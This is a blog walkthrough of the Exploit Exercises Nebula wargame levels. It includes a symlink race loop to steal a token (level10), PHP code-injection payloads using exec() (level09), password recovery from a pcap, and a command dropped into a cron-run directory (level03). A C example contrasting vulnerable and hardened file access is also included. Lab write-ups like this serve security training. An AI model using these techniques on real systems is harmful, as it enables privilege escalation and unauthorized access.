Thursday, June 30, 2016

Exploit Exercises - nebula level12





Command injection confirmed. The output is redirected to the local file /tmp/foo.


getflag


+++++

Exploit Exercises - nebula level10




Researching the requirements of access(), we find this:



The level10 directory has a file x which contains the token / password for flag10. It shouldn't be there. We need to find a way to transfer the token file.


We don't have access to the token.


We will need to exploit a race condition in the access() calls used in the program code:



Checking how flag10 works normally:




Ok.

The following steps are needed to exploit the access() race condition:

  1. Create a fake token file - echo fake_toke > /tmp/fake_token
  2. Create a soft link to our fake token - ln -sf /tmp/fake_token token
  3. Create a soft link to the real token with the same name - ln -s /home/flag10/token token
  4. Execute 1 & 2 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute the file transfer in a loop - while true; do /home/flag10/flag10 token 192.168.49.1; done





The token is transferred successfully. Use it to log in as flag10 and run getflag.
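The race above is a time-of-check/time-of-use gap: access() decides on a path, and open() later acts on whatever that path names at that moment. As an added example (not the flag10 source, which this post does not show; function names and the temp-dir self-check are my own), here is the vulnerable shape next to a hardened one that checks the descriptor it actually opened with fstat() instead of re-resolving the path:

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Vulnerable shape (the level10 race): access() judges the path with the real
   uid, open() then uses whatever the path points to at that later moment. */
int open_for_user_vulnerable(const char *path) {
    if (access(path, R_OK) != 0) return -1;
    return open(path, O_RDONLY);
}

/* May the real (not effective) user read this object? Simplified: ignores
   supplementary groups and does not special-case root. */
static int real_user_may_read(const struct stat *st) {
    if (st->st_uid == getuid()) return (st->st_mode & S_IRUSR) != 0;
    if (st->st_gid == getgid()) return (st->st_mode & S_IRGRP) != 0;
    return (st->st_mode & S_IROTH) != 0;
}

/* Hardened shape: open first, then decide on the descriptor with fstat(), so
   check and read refer to one object; O_NOFOLLOW also refuses symlinks. */
int open_for_user_safe(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        !real_user_may_read(&st)) { close(fd); return -1; }
    return fd;
}

/* Self-check in a fresh temp dir: an owner-readable file must be accepted, a
   mode-000 file and a symlink must be rejected. Returns 1 when all three hold. */
int demo(void) {
    char dir[] = "/tmp/nebula10_XXXXXX", ok[64], locked[64], lnk[64];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(ok, sizeof ok, "%s/readable", dir);
    snprintf(locked, sizeof locked, "%s/locked", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);
    int result = 0;   /* close(-1) fails, so close(open(...)) == 0 means "created" */
    if (close(open(ok, O_WRONLY | O_CREAT, 0600)) == 0 &&
        close(open(locked, O_WRONLY | O_CREAT, 0000)) == 0 && symlink(ok, lnk) == 0) {
        int a = open_for_user_safe(ok), b = open_for_user_safe(locked), c = open_for_user_safe(lnk);
        result = (a >= 0 && b < 0 && c < 0);
        if (a >= 0) close(a);
    }
    unlink(ok); unlink(locked); unlink(lnk); rmdir(dir);
    return result;
}
```

Dropping the effective privileges before the open (seteuid to the real uid) is the other standard fix; either way the decision must be made on the object that is actually read.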


+++++

Exploit Exercises - nebula level09




flag09 reads the file supplied as arg1. We also need to supply a second argument, but it is not used. If we do not supply arg2, an error is thrown, but the file specified by arg1 is still read.


After trial and error, we found a syntax that flag09 accepts:
    [email $phpinfo()]

This makes flag09 treat phpinfo() as a variable name, but it throws an error.



First success: found the correct syntax to get phpinfo() executed ->
    [email {${phpinfo()}}]



Success: using PHP's exec() function to execute getflag/id
    [email {${exec(id)}}]


+++++

Wednesday, June 29, 2016

Exploit Exercises - nebula level08






Use tcpflow to read capture.pcap:
# tcpflow -c -e -r capture.pcap | more


Password seen -> backdoor...00Rm8.ate



Each dot is a backspace (delete) keypress. The correct password is -> backd00Rmate


+++++

Exploit Exercises - nebula level07





Command Injection confirmed.




Web server is running on TCP 7007.


Execute index.cgi with our payload. The results are stored in the index.cgi output file.


+++++

Exploit Exercises - nebula level06



# password cracked - hello




+++++

Tuesday, June 28, 2016

Exploit Exercises - nebula level05










+++++

Exploit Exercises - nebula level03



# echo "id > /tmp/pwn_log" >> /home/flag03/writeable.d/run_this
# echo "getflag >> /tmp/pwn_log" >> /home/flag03/writeable.d/run_this




The writeable.sh script picks up any file in the writeable.d directory and executes it. Since it does not print any output, we need to redirect the output of the commands it runs to a file.



+++++

Exploit Exercises - nebula level04









+++++
